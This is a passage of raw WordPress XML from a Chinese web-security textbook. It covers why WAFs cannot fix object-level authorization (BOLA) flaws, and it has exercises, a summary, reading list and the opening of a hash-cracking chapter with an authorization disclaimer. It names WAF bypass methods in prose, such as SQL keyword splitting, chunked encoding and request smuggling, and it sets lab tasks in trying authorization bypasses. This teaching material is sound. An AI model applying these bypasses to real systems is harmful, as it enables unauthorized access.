        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是因为输入被送入了含执行语义的模板引擎（而非纯渲染）；反序列化是因不可信数据被还原为对象并在构造函数、析构函数或魔术方法中触发隐式的代码执行（Pop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain）。其共性仍是“数据越过边界，获得不当的代码/逻辑解释权”。此为注入类漏洞的第一性原理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1134"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题：API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">越权（BOLA）为何依靠</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">无法根治</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">假设你是一个安全架构师，你需要向管理层解释为什么公司购买了顶级</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF，但对象级越权漏洞仍必须由开发团队修复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> P 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">级别。请从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对请求的认知模型出发给出原因。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答与提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工作在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语法与已知攻击签名层面。BOLA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结构与合法请求无法区分——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/users/123</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不包含任何攻击语法。WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不具备理解“用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只能访问自身数据”这一业务逻辑所需的应用会话上下文与数据库映射关系。此校验必须由应用层在获取当前会话的用户身份后，在数据访问之前执行。因此，WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无法根治任何“逻辑漏洞”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题：WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">为何被描述为“纵深非根治”？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请列举至少三个在本书中已经学到、可以绕过语法型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的技术途径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答与提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：从全书体系回顾：(a)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用合法业务逻辑的越权（本章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BOLA），无特征被阻断；(b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入中的语法等价变形，如大小写混合、注释符内联拆分关键字，可能绕过基于正则的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF；(c)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分块传输编码（Transfer-Encoding:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">chunked）拆分攻击向量；(d)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">未解析的协议层——如利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求走私（Request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Smuggling）使后端看到的请求与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">看到的不一致。这些绕过技术存在并不断演化，故防御必须在后端应用层通过严格编码而非依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">单点解决。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Academy，完成“API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing”学习路径下的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BOLA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关实验以及“Server-side</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Request Forgery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(SSRF)”实验（回顾第十章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">概念）。针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数中发现内网访问点，同时尝试构造请求观察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否介入（该平台部分实验模拟</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">但依赖应用逻辑防护）。记录你在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BOLA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验中是如何确认漏洞存在的，以及你尝试了哪些绕过授权检查的变种。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="228"/>
    <w:bookmarkStart w:id="229" w:name="小结-16"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全的核心假设是“接口的访问控制意图与调用者能力边界一致”。攻击者通过直接构造请求，绕过了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的引导，使得越权（特别是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BOLA）和隐藏</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的发现成为逻辑漏洞的主要形态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对象级越权（BOLA）发生在每次通过资源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问数据时缺失对当前用户所有权的校验。独立的服务端授权检查是唯一根治方法——自增</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID、UUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与前端隐藏均不能替代该步骤。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为语法层面的签名过滤器，对业务逻辑漏洞（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BOLA）完全无感，且可被语法等价变形与协议层攻击绕过。其正确角色是纵深体系中增加攻击成本并产生威胁信号，绝非代码漏洞的补丁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全开发生命周期（SDL）通过在需求、设计、编码、测试与运维各阶段嵌入安全活动，将防护措施左移并内化为软件质量属性，从根本上降低修复成本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">纵深防御总览框明确了从认证授权到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SDL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的五层环式结构——任何单一技术若被孤立为绝对防线，就是系统最脆弱的断点。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="229"/>
    <w:bookmarkStart w:id="230" w:name="延伸阅读白名单-8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP API Security Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发布针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的十大安全风险清单，包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BOLA、BFLA（功能级越权）、数据过度暴露等条目，是对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防进行分类的结构化指南。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本卷第八章已引入，通用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">十大风险，API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关问题可对应失效访问控制、加密失败等类别。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：免费在线靶场，其“API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing”章节提供了从路径枚举、方法篡改、参数污染到鉴权漏洞的系统实验，可与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接联动。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stuttard, D. and Pinto, M. — The Web Application Hacker’s Handbook, 2nd Edition</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">有关</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试方法论、越权测试以及绕过服务器端过滤的实战思路，是衔接靶场操作与安全思维的经典著作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">企业矩阵中的“Initial</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access”、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Credential Access”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Discovery”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等战术，可帮助防御者从攻击链视角理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞导致的实际业务后果。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="230"/>
    <w:bookmarkEnd w:id="231"/>
    <w:bookmarkEnd w:id="232"/>
    <w:bookmarkStart w:id="326" w:name="卷四-系统攻防与后渗透第-1318-章"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">卷四</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统攻防与后渗透（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 13–18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="261" w:name="密码学攻击哈希破解与密码学误用"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密码学攻击:哈希破解与密码学误用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="233" w:name="哈希破解与彩虹表离线爆破的机理"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">哈希破解与彩虹表:离线爆破的机理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节涉及密码哈希函数的单向性与碰撞抵抗，这些密码学基础已完整讲授于馆藏《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章“CM5：密码学数学”，此处直接使用，不再复述哈希函数的定义、MD5/SHA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">族的结构或雪崩效应。另，靶机环境的搭建与基本安全配置回指本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章，读者应已拥有一个隔离的虚拟化实验平台。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令、操作与示例仅限读者在自建的隔离实验室、官方授权的靶机平台（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTheBox、TryHackMe、VulnHub、OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">镜像）或已取得书面授权的评估目标上执行。严禁在任何未经授权的系统或生产网络中运行密码破解工具。实验网络必须与公网及任何生产内网物理或逻辑隔离。保护凭据是安全从业者的基本伦理，破解他人密码口令在任何未授权情况下均是违法行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">口令认证是信息安全的基石，而密码哈希函数的单向性将“验证”与“知晓”解耦：服务器存储的只是口令的摘要，而非明文。当数据库遭遇泄露——无论是</w:t>
      </w:r>
      <w:r>
